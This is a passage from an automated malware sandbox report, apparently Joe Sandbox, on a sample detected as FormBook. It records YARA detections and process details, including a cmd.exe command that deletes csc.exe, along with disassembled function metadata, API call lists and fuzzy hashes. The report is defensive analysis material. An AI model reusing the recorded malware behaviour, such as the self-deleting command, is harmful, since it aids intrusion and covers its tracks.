00000007.00000002.4562425329.00000000035E0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.4562358341.00000000035B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	06:33:06
Start date:	09/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0x1c0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	06:33:07
Start date:	09/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.5%
Total number of Nodes:	889
Total number of Limit Nodes:	51

Executed Functions

Function 00007FF67FA51460 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA5146F
GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514AD
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514D9
GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514EA
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514F9
GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA51590
GetProcessAffinityMask.KERNEL32 ref: 00007FF67FA515A3

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
String ID:
API String ID: 580471860-0
Opcode ID: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
Instruction ID: 231ce6c3222e11548c8cee0177279e693f0ee4f534f7b9584dd6117f92f8f41e
Opcode Fuzzy Hash: 03dbf51e9477a4b2f0782d4ffae03c46400fccc10c807166d3160a18ce5dc755
Instruction Fuzzy Hash: 2E515B73A28B46C6EA408F19E8409BA77A5FF45B94F844131D94ECB765EF3CE485C780

Function 00007FF67FA6D16A Relevance: 9.5, APIs: 4, Strings: 1, Instructions: 763COMMON

Download Yara Rule

APIs

DebugBreak.KERNEL32 ref: 00007FF67FA6D1B8

Strings

END, xrefs: 00007FF67FA6D73A

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: BreakDebug
String ID: END
API String ID: 456121617-2522575163
Opcode ID: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
Instruction ID: d2633ea4cede74edfb7ef20b5886df36a535396e3ba3e04d19d555e6d30545d9
Opcode Fuzzy Hash: 32de57e1a6750bfde0c47b7a68c88ed3004110d39829c2a4e75dfd4f32f0a8f4
Instruction Fuzzy Hash: 6B827873E29B46C6FA508B29A850A7633A0AF56F94F144236E95DC73A0EF3CF451C780

Function 00007FF67FA68830 Relevance: 3.5, APIs: 2, Instructions: 952COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 00007FF67FA689EC
LeaveCriticalSection.KERNEL32 ref: 00007FF67FA68A03

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
Instruction ID: e4f33378b2a55094f037e50817fd5aa2be1a35be69717c5872791ceb16b2672b
Opcode Fuzzy Hash: 6f93bc1d4941456f45dda91854c7f695a82bcce70b9b063c41ad38af2987899c
Instruction Fuzzy Hash: C1B26D77A29B46C5EB408B18E840A7AB3A4FF8AF84F544635DA5C97764EF3CE451C380

Function 00007FF67FA59340 Relevance: 2.7, Strings: 2, Instructions: 238
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

TraceGC is not turned on, xrefs: 00007FF67FA59346
Creation of WaitForGCEvent failed, xrefs: 00007FF67FA596C1

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: GlobalMemoryProcessQueryStatus$CurrentFrequencyInformationObjectPerformance
String ID: Creation of WaitForGCEvent failed$TraceGC is not turned on
API String ID: 133006248-518909315
Opcode ID: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
Instruction ID: cf31bfaf8b8723ab8f7307ffc87f224e0ff4526a24a8f3f1a4a0dfb4aae489a5
Opcode Fuzzy Hash: 3f99d9c4068ce16fac88113a0baf40306a504a41c0001bff05d2c2920de71d5b
Instruction Fuzzy Hash: F8B18063E3DB42C2FA019B24A441E7A6395AF5AB84F445235E54ECB792EF2CF481C3C0

Function 00007FF67FAD8FB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32 ref: 00007FF67FAD9026

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
Instruction ID: 177230d399ef7b4c0ce0b17d086066838fdc7476aa65af009e5ce95776644b16
Opcode Fuzzy Hash: ecc120c17447902b84dd65978579eb4ee08e6082c242e837b02859beb14b59ee
Instruction Fuzzy Hash: B8219D33A29A50DAD724DF65E8009E937A4FB48398F600136FE4E83A89DF38D481C380

Function 00007FF67FA6DFD0 Relevance: .7, Instructions: 685COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
Instruction ID: ae7855b5292f39140080c13b91cb65648137a30f758fc156c308db44dd421f90
Opcode Fuzzy Hash: 097b62bcefa2e15c075ed7cd1fc2a7246b24135ed2dc7981fe42efd19a6c3ad6
Instruction Fuzzy Hash: 9D621573E38746C6FB658B29A494B367391BF66B84F108635E90ED3290FF3DA440C685

Function 00007FF67FA72370 Relevance: .4, Instructions: 392COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: CurrentProcess
String ID:
API String ID: 2050909247-0
Opcode ID: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
Instruction ID: 0e73cbc486fa273998ffb72d0c59775d30c542193f2081b0ed54c2571969d516
Opcode Fuzzy Hash: bdf8833cee21c139ef57a5bee3b8c50e71db7ac1327d835877ec4aba224b51aa
Instruction Fuzzy Hash: 5902A0A3E38646C6FA158B26A850E3A77E1EF56B80F185736C50DD3264DF3CB581CAD0

Function 00007FF67FA70C50 Relevance: .3, Instructions: 317COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
Instruction ID: a9c75e7b245382a5fbde1bccbdf63ac2f6334caa76ba3081853cf08f1054cd8b
Opcode Fuzzy Hash: 43a4ce6d3edcbc3c7c6dd526977bf27065133be5ff1af8be5729591fa77bad5d
Instruction Fuzzy Hash: CBF17E23D3CB8385F601DB34A951A7667A1AFA6B40F549335E44DE66A2FF2C74D1C2C0

Function 00007FF67FA6C9B6 Relevance: 16.1, APIs: 4, Strings: 5, Instructions: 393
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

condemned generation num: %d, xrefs: 00007FF67FA6CB11
qX, xrefs: 00007FF67FA6CAFA
BEGIN, xrefs: 00007FF67FA6CC04
.NET BGC, xrefs: 00007FF67FA6CCC6
m, xrefs: 00007FF67FA6CA3E

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID:
String ID: .NET BGC$BEGIN$condemned generation num: %d$m$qX
API String ID: 0-2393834873
Opcode ID: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
Instruction ID: 2d9f5b13a9cbeee741b2256b4233a1bf8ed8f912851d4f29a8c01ce2f4d1789c
Opcode Fuzzy Hash: b4573e5521eb2daec4fdc1dac7b857241a61d624bfb449cc36c2373dcde47909
Instruction Fuzzy Hash: F7224063D2C687C5F6119F29A841AB663A4FF66F45F046235EA4CD2262EF3CB481C7C0

Function 00007FF67FA51010 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67FA5105B
IsProcessInJob.KERNEL32 ref: 00007FF67FA5106B
QueryInformationJobObject.KERNEL32 ref: 00007FF67FA5109B
GlobalMemoryStatusEx.KERNEL32 ref: 00007FF67FA51104
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF67FA51143
GlobalMemoryStatusEx.KERNELBASE ref: 00007FF67FA5118C

Strings

@, xrefs: 00007FF67FA510EC
@, xrefs: 00007FF67FA51181
@, xrefs: 00007FF67FA51138

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
String ID: @$@$@
API String ID: 2645093340-1177533131
Opcode ID: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
Instruction ID: 5bad997d11e62d657e629cacdc490483507d94a631a25cf27ed3222dbc2aa856
Opcode Fuzzy Hash: 5dd9200fce8176dff0c68b0307820b989f4da3af5f934f64af2f0f02580b9126
Instruction Fuzzy Hash: 624162327186D1C5EF718F11E554BAAB7A0FB49BA0F444235DA9D93B88CF7CD4858B40

Function 00007FF67FA4B820 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF67FA4474F,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B82B

Part of subcall function 00007FF67FA51460: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA5146F
Part of subcall function 00007FF67FA51460: GetNumaHighestNodeNumber.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514AD
Part of subcall function 00007FF67FA51460: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514D9
Part of subcall function 00007FF67FA51460: GetProcessGroupAffinity.KERNELBASE(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514EA
Part of subcall function 00007FF67FA51460: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF67FA4B84A), ref: 00007FF67FA514F9

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00007FF67FA4474F,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B89D
GetProcessAffinityMask.KERNEL32 ref: 00007FF67FA4B8B0
QueryInformationJobObject.KERNEL32 ref: 00007FF67FA4B8FE

Strings

PROCESSOR_COUNT, xrefs: 00007FF67FA4B866

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem
String ID: PROCESSOR_COUNT
API String ID: 1701933505-4048346908
Opcode ID: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
Instruction ID: a5cac764b5403ba42d4dc29df0413a48598a11d567901d21fdec7b3d0a93917e
Opcode Fuzzy Hash: 1798012f5346184bb27c1ec9873b0fd67c426a3d4d250c8375ff5738cd3cdd6f
Instruction Fuzzy Hash: 94317C27A28B43C6EA549B99D480BB963A1EF85798F440036D64EC7696DF2CE449C780

Function 00007FF67FA44740 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 108
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF67FA4B820: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF67FA4474F,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B82B
Part of subcall function 00007FF67FA4B820: QueryInformationJobObject.KERNEL32 ref: 00007FF67FA4B8FE

Part of subcall function 00007FF67FA4B6C0: GetModuleHandleExW.KERNEL32(?,?,?,?,00007FF67FA44778,?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA4B6D1

RaiseFailFastException.KERNEL32(?,?,?,?,?,?,00007FF67FA41EA0), ref: 00007FF67FA448BE

Strings

The required instruction sets are not supported by the current CPU., xrefs: 00007FF67FA448AA
StressLogLevel, xrefs: 00007FF67FA44830
TotalStressLogSize, xrefs: 00007FF67FA447F5

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: AllocExceptionFailFastHandleInformationModuleObjectQueryRaise
String ID: The required instruction sets are not supported by the current CPU.$StressLogLevel$TotalStressLogSize
API String ID: 3403879507-2841289747
Opcode ID: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
Instruction ID: 13efd58772c9a648a159fa9da1b5ce6179f3e2b234ac625f505f19ef33921cad
Opcode Fuzzy Hash: 82d5e33e1a75b53c9fbb5bab012175d66cbb518565e50815a25de26a1c9dfd7f
Instruction Fuzzy Hash: 45416C33E3C683C5EA40AB69A802EB963A1AF51B84F584171ED4DD7696DF2CF406C7D0

Function 00007FF67FA454E0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF67FA45595
RaiseFailFastException.KERNEL32(?,?,?,00007FF67FAFE640), ref: 00007FF67FA455C1
RaiseFailFastException.KERNEL32(?,?,?,00007FF67FAFE640), ref: 00007FF67FA455FA

Strings

Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF67FA455E6

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBC7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135001038.00007FF67FBCC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2135069156.00007FF67FBCF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff67fa40000_Iifpj4i2kC.jbxd

Similarity

API ID: ExceptionFailFastRaise$Sleep
String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
API String ID: 3706814929-926682358
Opcode ID: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
Instruction ID: d15a904811fa749a1f2056561df4dd2494a9daec91677c17e913652d938ca052
Opcode Fuzzy Hash: 24fe811f686bbb4834d6a3b880013902d716c1d808400b7a0a2472452d19c6de
Instruction Fuzzy Hash: A4412B37A39A42C6EF909F19E840B7A33A5EB45B84F144139DA9DC23A0DF3DE495C781

Function 00007FF67FA4BA80 Relevance: 6.0, APIs: 4, Instructions: 26
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNELBASE ref: 00007FF67FA4BAA1
SetThreadPriority.KERNELBASE ref: 00007FF67FA4BABD
ResumeThread.KERNELBASE ref: 00007FF67FA4BAC6
CloseHandle.KERNELBASE ref: 00007FF67FA4BACF

Memory Dump Source

Source File: 00000000.00000002.2134602131.00007FF67FA41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF67FA40000, based on PE: true

Associated: 00000000.00000002.2134582345.00007FF67FA40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134699848.00007FF67FB29000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2134942464.00007FF67FB5A000.00000002.00000001.01000000.00000003.sdmpDownload File
